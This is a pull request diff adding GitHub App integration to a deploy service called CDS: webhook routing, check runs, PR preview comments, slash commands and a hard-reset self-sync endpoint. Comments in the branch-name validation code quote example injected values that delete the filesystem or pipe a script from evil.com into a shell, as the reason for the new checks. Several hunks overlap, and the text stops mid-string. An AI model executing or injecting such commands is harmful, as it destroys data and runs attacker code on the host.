### PR TITLE
CDS GitHub 集成 — Railway 式 push→preview + PR check runs

### DIFF
--- a/cds/src/config.ts
+++ b/cds/src/config.ts
@@ -1,6 +1,6 @@
 import fs from 'node:fs';
 import path from 'node:path';
-import type { CdsConfig, CdsMode } from './types.js';
+import type { CdsConfig, CdsMode, GitHubAppConfig } from './types.js';
 
 function parseCsv(value: string | undefined): string[] | undefined {
   if (!value) return undefined;
@@ -16,6 +16,35 @@ function resolveMode(): CdsMode {
 
 const configuredRootDomains = parseCsv(process.env.CDS_ROOT_DOMAINS || process.env.ROOT_DOMAINS);
 const primaryRootDomain = configuredRootDomains?.[0];
+
+/**
+ * Resolve the GitHub App credentials from env vars so operators can keep
+ * the PEM private key in `.cds.env` (produced by `exec_cds.sh`) without
+ * hand-editing cds.config.json. Returns undefined when any required field
+ * is missing — the webhook router and deploy-side check-run hooks both
+ * tolerate the dormant state and short-circuit to a friendly 503 / no-op.
+ *
+ * Env contract:
+ *   CDS_GITHUB_APP_ID              — numeric App ID (required)
+ *   CDS_GITHUB_APP_PRIVATE_KEY     — PEM, literal `\n` tolerated (required)
+ *   CDS_GITHUB_WEBHOOK_SECRET      — HMAC-SHA256 secret (required)
+ *   CDS_GITHUB_APP_SLUG            — optional, only for rendering install URL
+ */
+function resolveGitHubApp(): GitHubAppConfig | undefined {
+  const appId = process.env.CDS_GITHUB_APP_ID?.trim();
+  const rawKey = process.env.CDS_GITHUB_APP_PRIVATE_KEY?.trim();
+  const webhookSecret = process.env.CDS_GITHUB_WEBHOOK_SECRET?.trim();
+  if (!appId || !rawKey || !webhookSecret) return undefined;
+  // PEM keys embedded in env vars often arrive with literal `\n` instead of
+  // real newlines. Accept both so `.cds.env` and docker-compose env work.
+  const privateKey = rawKey.includes('\\n') ? rawKey.replace(/\\n/g, '\n') : rawKey;
+  return {
+    appId,
+    privateKey,
+    webhookSecret,
+    appSlug: process.env.CDS_GITHUB_APP_SLUG?.trim() || undefined,
+  };
+}
 
 function resolveBootstrapToken(): { value: string; expiresAt: string } | undefined {
   const value = process.env.CDS_BOOTSTRAP_TOKEN;
@@ -83,6 +112,14 @@ const DEFAULT_CONFIG: CdsConfig = {
     diskWarnPercent: 80,
     sweepIntervalSeconds: 3600,
   },
+  // GitHub App credentials for the Railway-style check-run integration.
+  // Absent when any of CDS_GITHUB_APP_ID / _PRIVATE_KEY / _WEBHOOK_SECRET
+  // is unset — the webhook route returns 503 not_configured in that case.
+  githubApp: resolveGitHubApp(),
+  // Public-facing base URL used for GitHub check-run `details_url` and the
+  // GitHub App install redirect. Falls back to http://localhost:<masterPort>
+  // at call-sites when unset so local-dev setups still function.
+  publicBaseUrl: process.env.CDS_PUBLIC_BASE_URL?.trim() || undefined,
 };
 
 export function loadConfig(configPath?: string): CdsConfig {

--- a/cds/src/middleware/github-auth.ts
+++ b/cds/src/middleware/github-auth.ts
@@ -24,6 +24,10 @@ const PUBLIC_PATHS: (string | RegExp)[] = [
   '/login-gh.html',
   '/api/auth/github/login',
   '/api/auth/github/callback',
+  // GitHub App webhook is authenticated by HMAC signature verification
+  // inside the route handler, not by the CDS session cookie. Must be
+  // public so GitHub's outbound webhook can reach it.
+  '/api/github/webhook',
   // Static assets the login page needs before a session exists.
   '/style.css',
   '/favicon.svg',

--- a/cds/src/routes/branches.ts
+++ b/cds/src/routes/branches.ts
@@ -5685,7 +5685,40 @@ cdscli project list --human
       }
       send('resolve', 'done', '目标分支: ' + target);
 
-      // Step 3: hard-reset to origin/<target>
+      // Step 3a: checkout target branch BEFORE the hard reset.
+      //
+      // Without this, calling with {branch:'develop'} while HEAD is on
+      // 'main' would `git reset --hard origin/develop` and move the
+      // CURRENT branch (main) to develop's commit — corrupting main's
+      // tracking. self-update does this right; we were missing it.
+      // Caught by Cursor Bugbot #450 round 7 (HIGH).
+      send('checkout', 'running', `切换到 ${target} 分支...`);
+      const coRes = await shell.exec(`git checkout -f ${target}`, { cwd: repoRoot, timeout: 30_000 });
+      if (coRes.exitCode !== 0) {
+        // Fallback: create tracking branch from origin if it doesn't exist
+        // locally yet (same dance self-update performs).
+        const fbRes = await shell.exec(`git checkout -f -b ${target} origin/${target}`, { cwd: repoRoot, timeout: 30_000 });
+        if (fbRes.exitCode !== 0) {
+          const errMsg = (combinedOutput(fbRes) || '未知错误').trim();
+          send('checkout', 'error', `切换失败: ${errMsg.slice(0, 200)}`);
+          sendSSE(res, 'error', { message: `无法切换到 ${target}: ${errMsg}` });
+          res.end();
+          return;
+        }
+      }
+      // Verify we actually ended up on the target branch — catch any
+      // silent checkout-succeeds-but-HEAD-elsewhere edge case.
+      const verify = await shell.exec('git rev-parse --abbrev-ref HEAD', { cwd: repoRoot });
+      const actual = verify.stdout.trim();
+      if (actual !== target) {
+        send('checkout', 'error', `切换未生效: 期望 ${target},实际 ${actual}`);
+        sendSSE(res, 'error', { message: `git checkout 未生效: 仍在 ${actual}` });
+        res.end();
+        return;
+      }
+      send('checkout', 'done', `已切到 ${target}`);
+
+      // Step 3b: hard-reset to origin/<target>
       send('reset', 'running', `硬对齐 HEAD → origin/${target}`);
       const resetRes = await shell.exec(`git reset --hard origin/${target}`, { cwd: repoRoot, timeout: 30_000 });
       if (resetRes.exitCode !== 0) {

--- a/cds/src/routes/branches.ts
+++ b/cds/src/routes/branches.ts
@@ -21,6 +21,7 @@ import { detectStack } from '../services/stack-detector.js';
 import { assertProjectAccess } from './projects.js';
 import { CheckRunRunner } from '../services/check-run-runner.js';
 import { GitHubAppClient } from '../services/github-app-client.js';
+import { isSafeGitRef } from '../services/github-webhook-dispatcher.js';
 
 /**
  * P4 Part 18 (hardening): pre-restart sanity check for self-update.
@@ -1024,11 +1025,20 @@ export function createBranchRouter(deps: RouterDeps): Router {
       entry.status = 'building';
 
       // ── GitHub Checks integration ──
-      // If the branch was pushed by a webhook we stored the triggering
-      // commit SHA on it. When the deploy is triggered by the UI (no
-      // SHA yet) fall back to the current worktree HEAD so every deploy
-      // that links to a GitHub repo produces a check run.
-      if (entry.githubRepoFullName && !entry.githubCommitSha) {
+      // Priority for the commit SHA fed to the check run:
+      //   1. req.body.commitSha — the authoritative value from the
+      //      webhook-originated dispatcher, pinned at webhook-handling
+      //      time so concurrent pushes can't race it
+      //   2. entry.githubCommitSha — stored on the branch by the push
+      //      handler (same value in the normal flow)
+      //   3. current worktree HEAD — fallback for UI-triggered deploys
+      // If none of the above resolve, the check-run path is a no-op.
+      const bodyCommitSha = typeof req.body?.commitSha === 'string'
+        && /^[0-9a-f]{7,40}$/i.test(req.body.commitSha)
+        ? req.body.commitSha : undefined;
+      if (bodyCommitSha) {
+        entry.githubCommitSha = bodyCommitSha;
+      } else if (entry.githubRepoFullName && !entry.githubCommitSha) {
         try {
           const sha = await shell.exec('git rev-parse HEAD', { cwd: entry.worktreePath });
           if (sha.exitCode === 0) {
@@ -5416,6 +5426,17 @@ cdscli project list --human
 
       // Step 2: switch branch if specified
       if (branch) {
+        // Defense-in-depth: even though /api/self-update sits behind
+        // cookie/AI-key auth, an authenticated user supplying
+        // `branch='main; rm -rf /'` would otherwise run arbitrary
+        // commands. Reject shell-unsafe refs before they reach
+        // `shell.exec()`.
+        if (!isSafeGitRef(branch)) {
+          send('checkout', 'error', `拒绝不安全分支名: ${branch.slice(0, 80)}`);
+          sendSSE(res, 'error', { message: `不合法的分支名: ${branch}` });
+          res.end();
+          return;
+        }
         send('checkout', 'running', `正在切换到分支 ${branch}...`);
         // Use -f to discard tracked-file changes (safe: untracked files like .cds/state.json are untouched)
         const checkoutResult = await shell.exec(`git checkout -f ${branch}`, { cwd: repoRoot });
@@ -5460,6 +5481,15 @@ cdscli project list --human
       // still use `git reflog` to recover.
       send('pull', 'running', '正在硬对齐到远端最新...');
       const targetBranch = branch || (await shell.exec('git rev-parse --abbrev-ref HEAD', { cwd: repoRoot })).stdout.trim();
+      // Guard the fallback branch too — a corrupted HEAD state could
+      // theoretically return something shell-unsafe (unlikely but the
+      // check costs nothing).
+      if (!isSafeGitRef(targetBranch)) {
+        send('pull', 'error', `拒绝不安全分支名: ${targetBranch.slice(0, 80)}`);
+        sendSSE(res, 'error', { message: `不合法的 target branch: ${targetBranch}` });
+        res.end();
+        return;
+      }
       const resetResult = await shell.exec(
         `git reset --hard origin/${targetBranch}`,
         { cwd: repoRoot },
@@ -5638,11 +5668,20 @@ cdscli project list --human
       }
       send('fetch', 'done', '远端 ref 已同步');
 
-      // Step 2: resolve target branch (use current if not supplied)
+      // Step 2: resolve target branch (use current if not supplied).
+      // Reject shell-unsafe refs up front — the endpoint is auth-gated
+      // but defense-in-depth against an attacker with a valid AI key
+      // crafting `branch='main; curl evil.com | sh'` is cheap.
       let target = branch;
       if (!target) {
         const cur = await shell.exec('git rev-parse --abbrev-ref HEAD', { cwd: repoRoot });
         target = cur.stdout.trim() || 'main';
+      }
+      if (!isSafeGitRef(target)) {
+        send('resolve', 'error', `拒绝不安全分支名: ${target.slice(0, 80)}`);
+        sendSSE(res, 'error', { message: `不合法的 branch: ${target}` });
+        res.end();
+        return;
       }
       send('resolve', 'done', '目标分支: ' + target);
 

--- a/cds/src/routes/branches.ts
+++ b/cds/src/routes/branches.ts
@@ -19,6 +19,8 @@ import { combinedOutput } from '../types.js';
 import { topoSortLayers } from '../services/topo-sort.js';
 import { detectStack } from '../services/stack-detector.js';
 import { assertProjectAccess } from './projects.js';
+import { CheckRunRunner } from '../services/check-run-runner.js';
+import { GitHubAppClient } from '../services/github-app-client.js';
 
 /**
  * P4 Part 18 (hardening): pre-restart sanity check for self-update.
@@ -97,6 +99,12 @@ export interface RouterDeps {
    * Defaults to `least-load` if not provided.
    */
   getClusterStrategy?: () => 'least-branches' | 'least-load' | 'round-robin';
+  /**
+   * Optional GitHubAppClient — when provided, deploys post "CDS Deploy"
+   * check runs back to GitHub so the PR's Checks panel mirrors CDS's
+   * build status. Absent when CDS_GITHUB_APP_* env vars aren't set.
+   */
+  githubApp?: GitHubAppClient;
 }
 
 export function createBranchRouter(deps: RouterDeps): Router {
@@ -109,9 +117,16 @@ export function createBranchRouter(deps: RouterDeps): Router {
     schedulerService,
     registry,
     getClusterStrategy,
+    githubApp,
   } = deps;
 
   const router = Router();
+
+  const checkRunRunner = new CheckRunRunner({
+    stateService,
+    githubApp,
+    config,
+  });
 
   // ── Cluster dispatch helper ──
   //
@@ -1007,7 +1022,26 @@ export function createBranchRouter(deps: RouterDeps): Router {
         if (svc.errorMessage) svc.errorMessage = undefined;
       }
       entry.status = 'building';
+
+      // ── GitHub Checks integration ──
+      // If the branch was pushed by a webhook we stored the triggering
+      // commit SHA on it. When the deploy is triggered by the UI (no
+      // SHA yet) fall back to the current worktree HEAD so every deploy
+      // that links to a GitHub repo produces a check run.
+      if (entry.githubRepoFullName && !entry.githubCommitSha) {
+        try {
+          const sha = await shell.exec('git rev-parse HEAD', { cwd: entry.worktreePath });
+          if (sha.exitCode === 0) {
+            entry.githubCommitSha = sha.stdout.trim();
+          }
+        } catch {
+          /* non-fatal — check run just won't fire */
+        }
+      }
       stateService.save();
+      // Open an in-progress check run — best effort, errors logged not
+      // thrown (so GitHub connectivity issues don't block the deploy).
+      await checkRunRunner.ensureOpen(entry);
 
       // Pull latest code
       logEvent({ step: 'pull', status: 'running', title: '正在拉取最新代码...', timestamp: new Date().toISOString() });
@@ -1227,6 +1261,14 @@ export function createBranchRouter(deps: RouterDeps): Router {
         message: completeMsg,
         services: entry.services,
       });
+      // Finalize the GitHub check run (best-effort). `hasError` decides
+      // success vs failure; the preview URL surfaces in the check-run
+      // summary so GitHub's "Details" button jumps straight to preview.
+      await checkRunRunner.finalize(entry, {
+        conclusion: hasError ? 'failure' : 'success',
+        summary: completeMsg,
+        previewUrl: checkRunRunner.derivePreviewUrl(entry),
+      });
     } catch (err) {
       entry.status = 'error';
       entry.errorMessage = (err as Error).message;
@@ -1236,6 +1278,11 @@ export function createBranchRouter(deps: RouterDeps): Router {
       stateService.save();
       logDeploy(id, `部署失败: ${(err as Error).message}`);
       sendSSE(res, 'error', { message: (err as Error).message });
+      await checkRunRunner.finalize(entry, {
+        conclusion: 'failure',
+        summary: (err as Error).message || '部署失败',
+        previewUrl: checkRunRunner.derivePreviewUrl(entry),
+      });
     } finally {
       res.end();
     }

--- a/cds/src/routes/branches.ts
+++ b/cds/src/routes/branches.ts
@@ -5576,6 +5576,132 @@ cdscli project list --human
   });
 
   // ─────────────────────────────────────────────────────────────────────
+  // POST /api/self-force-sync — recovery endpoint for divergent repos.
+  //
+  // When the CDS host's local git checkout has diverged from origin (e.g.
+  // a prior self-update silently merged, or an operator made a hot-patch
+  // commit), the regular /api/self-update can't recover because its
+  // `git pull` keeps creating merge commits that DROP remote changes.
+  // This endpoint is the escape hatch: hard-reset to origin + clear the
+  // dist/.build-sha cache so the next start recompiles from scratch +
+  // restart. Destructive to local commits, intentionally so.
+  //
+  // Streams SSE so the operator watching the UI gets real-time progress.
+  // ─────────────────────────────────────────────────────────────────────
+  router.post('/self-force-sync', async (req, res) => {
+    const { branch } = (req.body || {}) as { branch?: string };
+
+    initSSE(res);
+    const send = (step: string, status: string, title: string, extra?: Record<string, unknown>) => {
+      sendSSE(res, 'step', { step, status, title, timestamp: new Date().toISOString(), ...(extra || {}) });
+    };
+
+    try {
+      const repoRoot = config.repoRoot;
+      const cdsDir = path.join(repoRoot, 'cds');
+
+      // Step 1: fetch
+      send('fetch', 'running', '正在拉取远端 ref…');
+      const fetchRes = await shell.exec('git fetch --all --prune', { cwd: repoRoot, timeout: 60_000 });
+      if (fetchRes.exitCode !== 0) {
+        send('fetch', 'error', 'git fetch 失败: ' + (combinedOutput(fetchRes) || '').slice(0, 200));
+        sendSSE(res, 'error', { message: 'git fetch 失败' });
+        res.end();
+        return;
+      }
+      send('fetch', 'done', '远端 ref 已同步');
+
+      // Step 2: resolve target branch (use current if not supplied)
+      let target = branch;
+      if (!target) {
+        const cur = await shell.exec('git rev-parse --abbrev-ref HEAD', { cwd: repoRoot });
+        target = cur.stdout.trim() || 'main';
+      }
+      send('resolve', 'done', '目标分支: ' + target);
+
+      // Step 3: hard-reset to origin/<target>
+      send('reset', 'running', `硬对齐 HEAD → origin/${target}`);
+      const resetRes = await shell.exec(`git reset --hard origin/${target}`, { cwd: repoRoot, timeout: 30_000 });
+      if (resetRes.exitCode !== 0) {
+        send('reset', 'error', 'reset 失败: ' + (combinedOutput(resetRes) || '').slice(0, 200));
+        sendSSE(res, 'error', { message: `git reset --hard origin/${target} 失败` });
+        res.end();
+        return;
+      }
+      const newHead = (await shell.exec('git rev-parse --short HEAD', { cwd: repoRoot })).stdout.trim();
+      send('reset', 'done', `HEAD = ${newHead}`, { commitHash: newHead });
+
+      // Step 4: drop dist build cache so next start recompiles.
+      send('cache', 'running', '清除 dist/.build-sha 编译缓存…');
+      const shaFile = path.join(cdsDir, 'dist', '.build-sha');
+      try {
+        if (fs.existsSync(shaFile)) {
+          fs.unlinkSync(shaFile);
+          send('cache', 'done', '已删除 .build-sha');
+        } else {
+          send('cache', 'done', '.build-sha 不存在, 跳过');
+        }
+      } catch (err) {
+        send('cache', 'warning', '删除 .build-sha 失败: ' + (err as Error).message);
+      }
+
+      // Step 5: validate new code compiles before restart.
+      send('validate', 'running', '预检: pnpm install + tsc --noEmit…');
+      const validation = await validateBuildReadiness(shell, cdsDir);
+      if (!validation.ok) {
+        send('validate', 'error', `预检失败: ${validation.error.slice(0, 300)}`);
+        sendSSE(res, 'error', {
+          message: `force-sync 已中止 — ${target} 的代码没过预检: ${validation.error}`,
+        });
+        res.end();
+        return;
+      }
+      send('validate', 'done', validation.summary);
+
+      // Step 6: restart via exec_cds.sh daemon spawn, exit after 1s.
+      send('restart', 'running', '正在重启 CDS…');
+      sendSSE(res, 'done', { message: `CDS 即将重启, HEAD=${newHead}`, commitHash: newHead });
+      res.end();
+
+      // Same restart technique as /api/self-update — spawn a detached bash
+      // that runs exec_cds.sh daemon and let the current process die after
+      // a short grace period so the child can bind the port.
+      const errorLogPath = path.join(cdsDir, '.cds', 'self-update-error.log');
+      try {
+        fs.mkdirSync(path.dirname(errorLogPath), { recursive: true });
+        fs.appendFileSync(
+          errorLogPath,
+          `\n=== self-force-sync spawn at ${new Date().toISOString()} (branch=${target}) ===\n`,
+        );
+        const out = fs.openSync(errorLogPath, 'a');
+        const errFd = fs.openSync(errorLogPath, 'a');
+        const child = spawn('bash', ['./exec_cds.sh', 'daemon'], {
+          cwd: cdsDir,
+          detached: true,
+          stdio: ['ignore', out, errFd],
+          env: { ...process.env },
+        });
+        child.on('error', (err) => {
+          fs.appendFileSync(errorLogPath, `spawn error: ${err.message}\n`);
+        });
+        child.unref();
+        setTimeout(() => process.exit(0), 1000);
+      } catch (spawnErr) {
+        // If we can't spawn the replacement, at least we've persisted the
+        // reset — operator can manually `./exec_cds.sh restart` afterwards.
+        try {
+          fs.appendFileSync(errorLogPath, `pre-spawn error: ${(spawnErr as Error).message}\n`);
+        } catch {
+          /* ignore */
+        }
+      }
+    } catch (err) {
+      sendSSE(res, 'error', { message: (err as Error).message });
+      try { res.end(); } catch { /* already ended */ }
+    }
+  });
+
+  // ─────────────────────────────────────────────────────────────────────
   // Warm-pool scheduler API (v3.1)
   // See doc/design.cds-resilience.md §九.
   // When schedulerService is not wired in, these endpoints return a

--- a/cds/src/routes/branches.ts
+++ b/cds/src/routes/branches.ts
@@ -5415,11 +5415,37 @@ cdscli project list --human
         send('checkout', 'done', `已切换到 ${branch}`);
       }
 
-      // Step 3: pull latest
-      send('pull', 'running', '正在拉取最新代码...');
-      const pullResult = await shell.exec('git pull', { cwd: repoRoot });
-      const pullOutput = pullResult.stdout.trim();
-      send('pull', 'done', pullOutput.includes('Already up to date') ? '代码已是最新' : '代码已更新');
+      // Step 3: hard-reset local to the remote tip.
+      //
+      // Prior implementation used `git pull` which creates a merge commit
+      // when the local branch has diverged from origin. In managed CDS
+      // deployments divergence happens easily (e.g. a prior self-update
+      // left a locally-committed state, or the operator ran git commands
+      // on the host). An auto-merge can silently drop file changes — we
+      // actually hit this: settings.js grew by 438 lines on origin but
+      // pull's merge kept the local OLD version, serving stale UI.
+      //
+      // origin is the source of truth for a managed deployment, so we
+      // hard-reset to `origin/<branch>` after fetch. This is destructive
+      // to local uncommitted changes (checkout -f above already discards
+      // those) and to local-only commits (which shouldn't exist on a
+      // prod CDS anyway). For manual debugging branches, operators can
+      // still use `git reflog` to recover.
+      send('pull', 'running', '正在硬对齐到远端最新...');
+      const targetBranch = branch || (await shell.exec('git rev-parse --abbrev-ref HEAD', { cwd: repoRoot })).stdout.trim();
+      const resetResult = await shell.exec(
+        `git reset --hard origin/${targetBranch}`,
+        { cwd: repoRoot },
+      );
+      if (resetResult.exitCode !== 0) {
+        const errMsg = (resetResult.stderr || resetResult.stdout || '未知错误').trim();
+        send('pull', 'error', `硬对齐失败: ${errMsg}`);
+        sendSSE(res, 'error', { message: `无法对齐到 origin/${targetBranch}: ${errMsg}` });
+        res.end();
+        return;
+      }
+      const newHead = (await shell.exec('git rev-parse --short HEAD', { cwd: repoRoot })).stdout.trim();
+      send('pull', 'done', `已对齐到 origin/${targetBranch} @ ${newHead}`);
 
       // ──────────────────────────────────────────────────────────────
       // Step 3.5: pre-restart validation (P4 Part 18 hardening).

--- a/cds/src/routes/branches.ts
+++ b/cds/src/routes/branches.ts
@@ -1045,6 +1045,11 @@ export function createBranchRouter(deps: RouterDeps): Router {
 
       // Pull latest code
       logEvent({ step: 'pull', status: 'running', title: '正在拉取最新代码...', timestamp: new Date().toISOString() });
+      await checkRunRunner.progress(entry, {
+        title: '拉取最新代码…',
+        summary: `分支: \`${entry.branch}\`\n阶段: git fetch + reset`,
+        force: true,
+      });
       const pullResult = await worktreeService.pull(entry.branch, entry.worktreePath);
       logEvent({ step: 'pull', status: 'done', title: `已拉取: ${pullResult.head}`, detail: pullResult as unknown as Record<string, unknown>, timestamp: new Date().toISOString() });
 
@@ -1106,13 +1111,23 @@ export function createBranchRouter(deps: RouterDeps): Router {
       stateService.save();
 
       // ── Execute layer by layer (parallel within each layer) ──
-      for (const layer of layers) {
+      for (let layerIdx = 0; layerIdx < layers.length; layerIdx++) {
+        const layer = layers[layerIdx];
         const layerServiceNames = layer.items.map(p => p.name).join(', ');
         logEvent({
           step: `layer-${layer.layer}`,
           status: 'running',
           title: `启动第 ${layer.layer} 层: ${layerServiceNames}`,
           timestamp: new Date().toISOString(),
+        });
+        // Progress PATCH to GitHub so PR reviewers refreshing the Checks
+        // panel see "构建第 X/Y 层 (services...)" instead of a stale
+        // "Deploying to CDS…" for the entire build. Force=true so layer
+        // transitions always push even inside the 5s throttle window.
+        await checkRunRunner.progress(entry, {
+          title: `构建第 ${layerIdx + 1}/${layers.length} 层`,
+          summary: `分支 \`${entry.branch}\` 正在并行构建: ${layerServiceNames}`,
+          force: true,
         });
 
         const layerStartTime = Date.now();
@@ -1264,10 +1279,17 @@ export function createBranchRouter(deps: RouterDeps): Router {
       // Finalize the GitHub check run (best-effort). `hasError` decides
       // success vs failure; the preview URL surfaces in the check-run
       // summary so GitHub's "Details" button jumps straight to preview.
+      // logTail = last 80 events rendered as "[status] step: title"
+      // lines, surfaced under "Show more" in GitHub's Checks panel.
       await checkRunRunner.finalize(entry, {
         conclusion: hasError ? 'failure' : 'success',
         summary: completeMsg,
         previewUrl: checkRunRunner.derivePreviewUrl(entry),
+        logTail: opLog.events.slice(-80).map((ev) => {
+          const st = ev.status || '?';
+          const ttl = ev.title || ev.step;
+          return `[${st}] ${ev.step}: ${ttl}`;
+        }).join('\n'),
       });
     } catch (err) {
       entry.status = 'error';
@@ -1282,6 +1304,11 @@ export function createBranchRouter(deps: RouterDeps): Router {
         conclusion: 'failure',
         summary: (err as Error).message || '部署失败',
         previewUrl: checkRunRunner.derivePreviewUrl(entry),
+        logTail: opLog.events.slice(-80).map((ev) => {
+          const st = ev.status || '?';
+          const ttl = ev.title || ev.step;
+          return `[${st}] ${ev.step}: ${ttl}`;
+        }).join('\n'),
       });
     } finally {
       res.end();

--- a/cds/src/routes/github-webhook.ts
+++ b/cds/src/routes/github-webhook.ts
@@ -161,6 +161,36 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
       });
     }
 
+    // PR opened/reopened → post (or refresh) the preview-URL bot comment.
+    // PR closed → stop the branch's containers.
+    // Fire-and-forget; failures log to stderr, never bubble to the
+    // webhook response (GitHub only cares we returned 200 in time).
+    if (result.action === 'pr-comment-posted' && result.branchId && githubApp) {
+      void postOrUpdatePrComment(
+        stateService,
+        githubApp,
+        config,
+        result.branchId,
+        payload as { pull_request?: { number: number; html_url?: string; title?: string } },
+      ).catch((err) => {
+        // eslint-disable-next-line no-console
+        console.warn(
+          `[webhook] PR comment failed for branch=${result.branchId}:`,
+          (err as Error).message,
+        );
+      });
+    }
+    if (result.stopRequest) {
+      const stopReq = result.stopRequest;
+      void defaultLocalhostStop(config, stopReq.branchId).catch((err) => {
+        // eslint-disable-next-line no-console
+        console.warn(
+          `[webhook] stop dispatch failed for branch=${stopReq.branchId}:`,
+          (err as Error).message,
+        );
+      });
+    }
+
     res.json({
       ok: true,
       event: eventName,
@@ -169,6 +199,7 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
       message: result.message,
       branchId: result.branchId,
       deployDispatched: Boolean(result.deployRequest),
+      stopDispatched: Boolean(result.stopRequest),
     });
   });
 
@@ -330,4 +361,95 @@ function defaultLocalhostDeploy(config: CdsConfig): (branchId: string, commitSha
       })();
     }
   };
+}
+
+/**
+ * POST /api/branches/:id/stop to tear down a branch's preview containers.
+ * Called when a PR gets closed (merged or not) so we don't leave stale
+ * preview containers eating RAM after the PR is gone.
+ */
+async function defaultLocalhostStop(config: CdsConfig, branchId: string): Promise<void> {
+  const url = `http://127.0.0.1:${config.masterPort}/api/branches/${encodeURIComponent(branchId)}/stop`;
+  const res = await fetch(url, {
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'X-CDS-Internal': '1' },
+    body: JSON.stringify({}),
+  });
+  if (res.body && typeof (res.body as any).getReader === 'function') {
+    const reader = (res.body as any).getReader();
+    (async () => {
+      try {
+        while (true) {
+          const { done } = await reader.read();
+          if (done) break;
+        }
+      } catch { /* ignore */ }
+    })();
+  }
+}
+
+/**
+ * Post or refresh the preview-URL bot comment on a PR.
+ *
+ * First call for a branch creates the comment + stores its id on the
+ * branch (`githubPreviewCommentId`). Subsequent calls (e.g. triggered
+ * by a re-open) PATCH the same comment so the PR thread stays quiet.
+ *
+ * When the stored comment id fails to update (404 = user deleted it),
+ * we transparently recreate it.
+ */
+async function postOrUpdatePrComment(
+  stateService: StateService,
+  githubApp: GitHubAppClient,
+  config: CdsConfig,
+  branchId: string,
+  payload: { pull_request?: { number: number; html_url?: string; title?: string } },
+): Promise<void> {
+  const branch = stateService.getBranch(branchId);
+  if (!branch) return;
+  const repoFullName = branch.githubRepoFullName;
+  const instId = branch.githubInstallationId;
+  const prNumber = branch.githubPrNumber || payload.pull_request?.number;
+  if (!repoFullName || !instId || !prNumber) return;
+  const parts = repoFullName.split('/');
+  if (parts.length !== 2) return;
+  const [owner, repo] = parts;
+
+  // Build the comment body — Railway-style: bold "CDS Deploy" header +
+  // preview link + branch/SHA ref + autoDeploy toggle hint.
+  const host = config.previewDomain || config.rootDomains?.[0];
+  const previewUrl = host ? `https://${branchId}.${host}` : null;
+  const shortSha = (branch.githubCommitSha || '').slice(0, 7);
+  const lines = [
+    '## 🚀 CDS Deploy Preview',
+    '',
+    previewUrl
+      ? `- **Preview**: [${previewUrl}](${previewUrl})`
+      : '- **Preview**: (当前 CDS 未配置 previewDomain / rootDomains, 预览 URL 不可用)',
+    `- **Branch**: \`${branch.branch}\`${shortSha ? ` @ ${shortSha}` : ''}`,
+    `- **CDS Dashboard**: [${branchId}](${(config.publicBaseUrl || '').replace(/\/$/, '')}/branch-panel?id=${encodeURIComponent(branchId)})`,
+    '',
+    '<sub>push 到此分支会自动触发新部署, 本条评论会在每次部署后原地刷新。</sub>',
+  ];
+  const body = lines.join('\n');
+
+  if (branch.githubPreviewCommentId) {
+    try {
+      await githubApp.updateIssueComment(instId, owner, repo, branch.githubPreviewCommentId, body);
+      return;
+    } catch (err) {
+      // Fall through to recreate if PATCH fails (user deleted the comment)
+      // eslint-disable-next-line no-console
+      console.warn(
+        `[webhook] PR comment PATCH failed (id=${branch.githubPreviewCommentId}), will recreate:`,
+        (err as Error).message,
+      );
+    }
+  }
+
+  const result = await githubApp.createIssueComment(instId, owner, repo, prNumber, body);
+  stateService.updateBranchGithubMeta(branchId, {
+    githubPreviewCommentId: result.id,
+  });
+  stateService.save();
 }

--- a/cds/src/routes/github-webhook.ts
+++ b/cds/src/routes/github-webhook.ts
@@ -191,6 +191,28 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
       });
     }
 
+    // Slash commands — run the command + post a reply comment on the PR.
+    // Route-layer handles it so all GitHub API calls sit together, and
+    // the dispatcher stays pure (easy to unit-test).
+    if (result.slashCommand && githubApp) {
+      const sc = result.slashCommand;
+      const repoFullName = (payload as { repository?: { full_name: string } })?.repository?.full_name || '';
+      void runSlashCommand(
+        stateService,
+        githubApp,
+        config,
+        repoFullName,
+        sc,
+        dispatchDeploy,
+      ).catch((err) => {
+        // eslint-disable-next-line no-console
+        console.warn(
+          `[webhook] slash command failed for '${sc.command}':`,
+          (err as Error).message,
+        );
+      });
+    }
+
     res.json({
       ok: true,
       event: eventName,
@@ -200,6 +222,7 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
       branchId: result.branchId,
       deployDispatched: Boolean(result.deployRequest),
       stopDispatched: Boolean(result.stopRequest),
+      slashCommand: result.slashCommand?.command,
     });
   });
 
@@ -452,4 +475,116 @@ async function postOrUpdatePrComment(
     githubPreviewCommentId: result.id,
   });
   stateService.save();
+}
+
+/**
+ * Execute a `/cds <cmd>` slash command received via issue_comment on a
+ * PR. Dispatches the command and posts a reply comment on the PR so
+ * the user (or collaborator) sees a confirmation in the thread.
+ */
+async function runSlashCommand(
+  stateService: StateService,
+  githubApp: GitHubAppClient,
+  config: CdsConfig,
+  repoFullName: string,
+  sc: {
+    command: 'redeploy' | 'stop' | 'logs' | 'help' | 'unknown';
+    branchId?: string;
+    prNumber: number;
+    commentId: number;
+    arg?: string;
+    commenter: string;
+  },
+  dispatchDeploy?: (branchId: string, commitSha: string) => Promise<void>,
+): Promise<void> {
+  const parts = repoFullName.split('/');
+  if (parts.length !== 2) return;
+  const [owner, repo] = parts;
+
+  // Any command other than `help` needs a CDS branch to target. If we
+  // can't resolve one, reply with a hint instead of silently failing.
+  const project = stateService.findProjectByRepoFullName(repoFullName);
+  const instId = project?.githubInstallationId;
+  if (!instId) return;
+
+  const postReply = (body: string) =>
+    githubApp.createIssueComment(instId, owner, repo, sc.prNumber, body).catch((err) => {
+      // eslint-disable-next-line no-console
+      console.warn(`[slash] reply comment failed: ${(err as Error).message}`);
+    });
+
+  if (sc.command === 'help' || sc.command === 'unknown') {
+    const unknownLine = sc.command === 'unknown' ? `未知命令 \`${sc.arg}\` — 列一下支持的:\n\n` : '';
+    await postReply(
+      '## 🤖 CDS Slash Commands\n\n' +
+      unknownLine +
+      '| 命令 | 说明 |\n' +
+      '|------|------|\n' +
+      '| `/cds redeploy` | 强制触发一次新部署(适用于代码没变但想重跑构建) |\n' +
+      '| `/cds stop` | 停掉这个 PR 分支的预览容器 |\n' +
+      '| `/cds logs` | 回复一段最近 40 条部署日志尾部 |\n' +
+      '| `/cds help` | 显示本帮助 |\n\n' +
